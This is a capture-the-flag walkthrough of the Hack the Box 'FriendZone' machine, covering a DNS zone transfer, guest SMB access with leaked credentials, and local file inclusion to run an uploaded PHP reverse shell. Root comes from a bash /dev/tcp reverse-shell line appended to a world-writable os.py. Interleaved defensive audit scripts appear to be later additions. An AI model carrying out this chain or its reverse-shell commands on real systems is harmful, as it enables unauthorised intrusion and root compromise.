
Hack the Box - FriendZone

Hi there, this is my FriendZone machine walkthrough. An easy box, but I had so much fun with it.


  • OS: Linux
  • IP:
  • Difficulty: Easy


Let's start with nmap xD.

$ nmap -sV -sC -A -Pn
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-06 23:14 KST
Nmap scan report for
Host is up (0.30s latency).
Not shown: 993 closed ports
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|_  256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
53/tcp  open  domain
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE,; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -0s, deviation: 0s, median: -0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2019-06-06T17:14:52+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew: 
|_  -0s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.41 seconds

The services that interested me most were:

  1. FTP was running, but a username and password were required.
  2. HTTP and HTTPS were running too xD
  3. The server was also a DNS server for the domain friendzone.red.
  4. A Samba file server was running and allowed guest access xD

Check the HTTP and HTTPS ports

For I found this

FriendZone web

But for was a Not Found page of Apache.

However, there was an email address on the page, info@friendzoneportal.red. From the nmap result and this email address, I figured the server had two domains, friendzone.red and friendzoneportal.red, so I added both to my /etc/hosts file:

friendzone.red friendzoneportal.red

Now open the website again using these domains. The HTTP pages showed the same result, but when I tried HTTPS I found these.


FriendZone web


FriendZone web

The page source didn't contain any interesting hint; there were only those two GIF images.

Check for subdomains

I used the dig command to check whether any subdomains existed (because port 53 was open), and yes, they did xD

$ dig axfr friendzone.red @
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @
;; global options: +cmd
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.		604800	IN	AAAA	::1
friendzone.red.		604800	IN	NS	localhost.
friendzone.red.		604800	IN	A
administrator1.friendzone.red. 604800 IN A
hr.friendzone.red.	604800	IN	A
uploads.friendzone.red.	604800	IN	A
friendzone.red.		604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 377 msec
;; WHEN: Thu Jun 06 23:25:01 KST 2019
;; XFR size: 8 records (messages 1, bytes 261)
$ dig axfr friendzoneportal.red @
; <<>> DiG 9.10.6 <<>> axfr friendzoneportal.red @
;; global options: +cmd
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.	604800	IN	AAAA	::1
friendzoneportal.red.	604800	IN	NS	localhost.
friendzoneportal.red.	604800	IN	A
admin.friendzoneportal.red. 604800 IN	A
files.friendzoneportal.red. 604800 IN	A
imports.friendzoneportal.red. 604800 IN	A
vpn.friendzoneportal.red. 604800 IN	A
friendzoneportal.red.	604800	IN	SOA	localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 511 msec
;; WHEN: Thu Jun 06 23:25:25 KST 2019
;; XFR size: 9 records (messages 1, bytes 281)

I added the names from the A records to my /etc/hosts file:

administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red admin.friendzoneportal.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red
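The zone transfer above is the security finding of this section: the name server answered AXFR for anyone who asked, handing out every internal hostname. As an added audit helper (my own code, not part of the original walkthrough), here is a small parser for dig's AXFR output that reports whether a transfer succeeded and which hostnames it disclosed. The sample output is constructed from the transfer above; 192.0.2.10 is a documentation address standing in for the box's IP, which the post does not reproduce.

```python
# Added audit helper (not part of the original walkthrough): parse dig AXFR
# output and report whether the zone transfer succeeded and which hostnames it
# disclosed. SAMPLE_AXFR is constructed from the transfer shown in the post;
# 192.0.2.10 is a documentation address standing in for the box's IP.
from typing import List, Tuple

SAMPLE_AXFR = """\
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @192.0.2.10
;; global options: +cmd
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.\t\t604800\tIN\tAAAA\t::1
friendzone.red.\t\t604800\tIN\tNS\tlocalhost.
friendzone.red.\t\t604800\tIN\tA\t192.0.2.10
administrator1.friendzone.red. 604800 IN A\t192.0.2.10
hr.friendzone.red.\t604800\tIN\tA\t192.0.2.10
uploads.friendzone.red.\t604800\tIN\tA\t192.0.2.10
friendzone.red.\t\t604800\tIN\tSOA\tlocalhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 377 msec
;; XFR size: 8 records (messages 1, bytes 261)
"""

# What dig prints when the server refuses AXFR (constructed, for contrast).
REFUSED_AXFR = """\
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @192.0.2.10
;; global options: +cmd
; Transfer failed.
"""

Record = Tuple[str, int, str, str]   # (owner name, ttl, type, rdata)


def parse_axfr(text: str) -> List[Record]:
    """Return the resource records in dig output, skipping ';' comment lines."""
    records: List[Record] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":
            continue                      # not a record line
        name, ttl, _cls, rtype, *rdata = fields
        records.append((name.rstrip("."), int(ttl), rtype, " ".join(rdata)))
    return records


def transfer_allowed(text: str) -> bool:
    """A completed AXFR starts and ends with the zone's SOA; a refusal has none."""
    return any(rtype == "SOA" for _, _, rtype, _ in parse_axfr(text))


def disclosed_hosts(text: str) -> List[str]:
    """Hostnames leaked by the transfer (owners of A/AAAA records), for the report."""
    return sorted({name for name, _, rtype, _ in parse_axfr(text)
                   if rtype in ("A", "AAAA")})


if __name__ == "__main__":
    for label, out in (("friendzone.red", SAMPLE_AXFR), ("refused zone", REFUSED_AXFR)):
        print(f"{label}: transfer allowed = {transfer_allowed(out)}, "
              f"hosts = {disclosed_hosts(out)}")
```

On a real BIND server the fix is the `allow-transfer` option in named.conf, restricted to the secondary servers (or to none); after that change, dig prints "Transfer failed." and `transfer_allowed` returns False.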

Access to web page via domain name

There were 2 admin domains:

  • administrator1.friendzone.red
  • admin.friendzoneportal.red


I tried some SQL injection but it didn't work, and the page admin.friendzoneportal.red showed the message "Admin page is not developed yet !!! check for another one". So I figured only the first domain would work.

Let's check the SMB server

The nmap scan showed that SMB was running and allowed guest access, so I tried connecting to the file server as the guest user.

SMB Login

![SMB folder](htb-friendzone-7.png)

There were 3 shares, but after trying to mount them, only 2 could be mounted.

SMB Development Folder

Lol, I found some PHP shell files here, clearly a hint left behind by other players xD. I checked the share permissions and it was read/write.

And in the general share I found a creds.txt file holding the admin credentials.

SMB general folder

creds for the admin THING:

Check the admin webpage again xD

I used these credentials to log in to https://administrator1.friendzone.red and it showed a message like this.

Login Done ! visit /dashboard.php

So now check https://administrator1.friendzone.red/dashboard.php

FriendZone admin

The beginner PHP developer of this page told us to add some params to the URL to show the image. Haha, let's try...


FriendZone admin

I looked around and found nothing. I could only change the image name to a.jpg or b.jpg. But what is that pagename param???

Since I had found PHP shell files in the shared Development folder, I figured the pagename param must be a Local File Inclusion. So we need to know the real path of the Development share on the server.

nmap with the SMB share enumeration script

I googled for smb enum and found the smb-enum-shares script for nmap, so I ran nmap again.

$ nmap --script smb-enum-shares -p139
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-07 16:45 KST
Nmap scan report for friendzone.red (
Host is up (0.49s latency).
139/tcp open  netbios-ssn

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   Development: 
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   Files: 
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   IPC$: 
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   general: 
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$: 
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 92.14 seconds

I could see that the Development share was stored at /etc/Development.
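The scan above is also the kind of output a defender reviews to find shares that should never have been exposed: anything with "Anonymous access: READ/WRITE" lets an unauthenticated user drop files into the share's real path on disk. As an added audit helper (my own code, not part of the original walkthrough), here is a parser for nmap's smb-enum-shares output that maps each share to its server-side Unix path and lists the anonymously writable ones. The sample text is the scan output shown above.

```python
# Added audit helper (not part of the original walkthrough): parse nmap's
# smb-enum-shares output and list shares that anonymous users can write to,
# with their server-side paths. SAMPLE_SCAN is the scan output from the post.
from typing import Dict

SAMPLE_SCAN = r"""
Host script results:
| smb-enum-shares:
|   account_used: guest
|   Development:
|     Comment: FriendZone Samba Server Files
|     Users: 3
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   Files:
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   IPC$:
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   general:
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   print$:
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
"""


def parse_enum_shares(text: str) -> Dict[str, Dict[str, str]]:
    """Map share name -> {field: value} from the script's indented output."""
    shares: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                          # not part of the script output
        line = raw[1:].lstrip("_")            # drop the "| " / "|_" gutter
        indent = len(line) - len(line.lstrip(" "))
        body = line.strip()
        if not body or body.startswith("smb-enum-shares") or body.startswith("account_used"):
            continue
        if indent == 3 and body.endswith(":"):
            current = body[:-1]               # share header such as "Development:"
            shares[current] = {}
        elif indent >= 4 and current is not None and ": " in body:
            key, value = body.split(": ", 1)  # "Path: C:\etc\Development"
            shares[current][key] = value
    return shares


def unix_path(win_path: str) -> str:
    """Samba reports paths Windows-style (drive letter, backslashes); map them back."""
    if len(win_path) >= 2 and win_path[1] == ":":
        win_path = win_path[2:]
    return win_path.replace("\\", "/")


def anonymous_writable(shares: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Shares an unauthenticated user can write to, keyed to their real path."""
    return {
        name: unix_path(info["Path"])
        for name, info in shares.items()
        if "WRITE" in info.get("Anonymous access", "") and "Path" in info
    }


if __name__ == "__main__":
    for name, path in anonymous_writable(parse_enum_shares(SAMPLE_SCAN)).items():
        print(f"anonymous write: {name:<12} -> {path}")
```

Run against the scan above it flags Development (/etc/Development), general (/etc/general) and IPC$ (/tmp); the first two are the ones that matter for the rest of this box, and the fix on the Samba side is `guest ok = no` on those shares, or at least `writable = no`.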

Get access to the machine

Now I created a reverse shell file named a.php and copied it to that share. I started my netcat listener for the reverse shell and tried to execute it through the filename param on the admin website.

My a.php file should then be at /etc/Development/a.php. Using the Local File Inclusion, I opened it as


I left off the .php extension because the sample used pagename=timestamp without one.
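What makes this work is that the page appends ".php" to whatever pagename holds and includes the result, so the caller controls the whole path. As an added illustration (my own code, not the dashboard's real PHP), the following Python models that vulnerable resolver next to a hardened one that allowlists page names and checks that the resolved file stays under the web root. The web root and the allowed page names are assumptions, not values taken from the walkthrough.

```python
# Added example (not the dashboard's real PHP): a Python model of
# include($_GET['pagename'] . '.php') beside a hardened resolver. WEB_ROOT and
# ALLOWED_PAGES are assumptions, not values from the walkthrough.
import posixpath
from pathlib import PurePosixPath
from typing import Optional, Union

WEB_ROOT = PurePosixPath("/var/www/admin")        # assumed document root
ALLOWED_PAGES = {"timestamp", "dashboard"}        # assumed legitimate includes


def resolve_vulnerable(pagename: str) -> PurePosixPath:
    """The caller controls the whole path: joining an absolute pagename discards
    WEB_ROOT (just as PHP include honours an absolute path), and '..' walks out."""
    return WEB_ROOT / f"{pagename}.php"


def inside_web_root(candidate: Union[str, PurePosixPath]) -> bool:
    """Lexically normalise and check the result still lives under WEB_ROOT."""
    norm = posixpath.normpath(str(candidate))
    return posixpath.commonpath([str(WEB_ROOT), norm]) == str(WEB_ROOT)


def resolve_hardened(pagename: str) -> Optional[PurePosixPath]:
    """Allowlist first, containment check second (belt and braces); None = refuse."""
    if pagename not in ALLOWED_PAGES:
        return None
    candidate = WEB_ROOT / f"{pagename}.php"
    if not inside_web_root(candidate):
        return None
    return candidate


if __name__ == "__main__":
    for p in ("timestamp", "/etc/Development/a", "../../../etc/passwd"):
        print(f"{p!r}: vulnerable -> {resolve_vulnerable(p)}, "
              f"hardened -> {resolve_hardened(p)}")
```

The allowlist alone would be enough; the containment check is there so that a later change to the allowlist (say, reading page names from a config file) cannot quietly reintroduce the traversal.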

And on my reverse shell listener:

$ netcat -lvnp 1234
Connection from
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 17:37:35 up 34 min,  0 users,  load average: 2.85, 4.84, 5.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls /home
$ cd /home/friend
$ ls
$ cat user.txt
$ python -c "import pty;pty.spawn('/bin/bash')"

In /var/www/ I found the mysql_data.conf file, which contained the database user and password.

www-data@FriendZone:/home/friend$ cd /var/www
www-data@FriendZone:/var/www$ ls
admin	    friendzoneportal	   html		    uploads
friendzone  friendzoneportaladmin  mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend




So I tried to SSH into the machine using that password.

$ ssh friend@
friend@'s password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have mail.
Last login: Fri Jun  7 10:34:26 2019 from

And I got a fully interactive TTY shell.


After getting a shell on the box, I uploaded pspy64 and executed the binary. This is what I noticed.


The script reporter.py was run by root. I kept watching that process and saw the script was run by cron every few minutes. This is what was inside reporter.py. Most lines were commented out, but there was an import os line, which imports the os module from the Python 2.7 library.

friend@FriendZone:/opt/server_admin$ cat reporter.py

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''


# I need to edit the script later
# Sam ~ python developer

I went to the library directory, /usr/lib/python2.7. The interesting thing was that the python2.7 directory was world-writable.

friend@FriendZone:/usr/lib$ ls -la | grep python2
drwxrwxrwx 27 root root  16384 Jun 26 14:27 python2.7

And so was the file os.py.

friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx  1 root     root      25876 Jun 26 14:32 os.py
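Those two `ls -la` lines are the whole privilege escalation: a script that root runs from cron trusts every module it imports, so a world-writable library directory or module file is effectively a root-level finding. As an added audit helper (my own code, not part of the original walkthrough), here is a script that walks a Python library directory and reports every path any local user can modify. The `demo` function builds a constructed temporary tree with the same modes seen on the box so the check can be exercised offline.

```python
# Added audit helper (not part of the original walkthrough): find paths in a
# Python library directory that any local user can modify. A script that root
# runs from cron (like reporter.py) trusts every module it imports, so a
# world-writable os.py or library directory is a root-level finding.
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List


def world_writable(path: Path) -> bool:
    """True if the mode has o+w. Symlinks are skipped (their target is checked
    on its own) and sticky directories such as /tmp are not flagged, since
    other users cannot replace entries they do not own there."""
    st = path.lstat()
    if stat.S_ISLNK(st.st_mode) or not st.st_mode & stat.S_IWOTH:
        return False
    if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
        return False
    return True


def audit_library_dir(root: Path) -> List[Path]:
    """Every path under root (root itself included) that is world-writable."""
    findings = []
    for p in [root, *root.rglob("*")]:
        try:
            if world_writable(p):
                findings.append(p)
        except FileNotFoundError:       # entry vanished mid-walk
            continue
    return sorted(findings)


def demo() -> Dict[str, bool]:
    """Build a constructed tree with the same modes seen on the box and audit it."""
    base = Path(tempfile.mkdtemp(prefix="libaudit-"))
    lib = base / "python2.7"
    lib.mkdir()
    (lib / "os.py").write_text("# constructed stand-in for the real module\n")
    (lib / "good.py").write_text("# correctly permissioned module\n")
    os.chmod(lib / "os.py", 0o777)      # -rwxrwxrwx, as in the ls -la above
    os.chmod(lib / "good.py", 0o644)    # what a stdlib module should look like
    os.chmod(lib, 0o777)                # drwxrwxrwx, as in the ls -la above
    flagged = set(audit_library_dir(lib))
    return {p.relative_to(base).as_posix(): p in flagged
            for p in (lib, lib / "os.py", lib / "good.py")}


if __name__ == "__main__":
    print("constructed tree:", demo())
    # Check the running interpreter's own standard library directory.
    stdlib = Path(os.__file__).resolve().parent
    print(f"{stdlib}:", [str(p) for p in audit_library_dir(stdlib)] or "nothing world-writable")
```

On a healthy system the stdlib check prints nothing: the directory should be root-owned with mode 755 and the modules 644, which is also the fix for the box.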

Since reporter.py was always run by root and imported the os module, I appended a line to os.py to execute a reverse shell.

system("bash -c 'bash -i &>/dev/tcp/ 0<&1'")

I also ran a netcat listener for this reverse shell and waited for the cron job to execute the script.

And I got a root shell.

$ nc -lvnp 1234
Connection from
bash: cannot set terminal process group (3435): Inappropriate ioctl for device
bash: no job control in this shell
root@FriendZone:~# id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# ls  
root@FriendZone:~# cat root.txt

Rooted, and I hope you enjoy this xD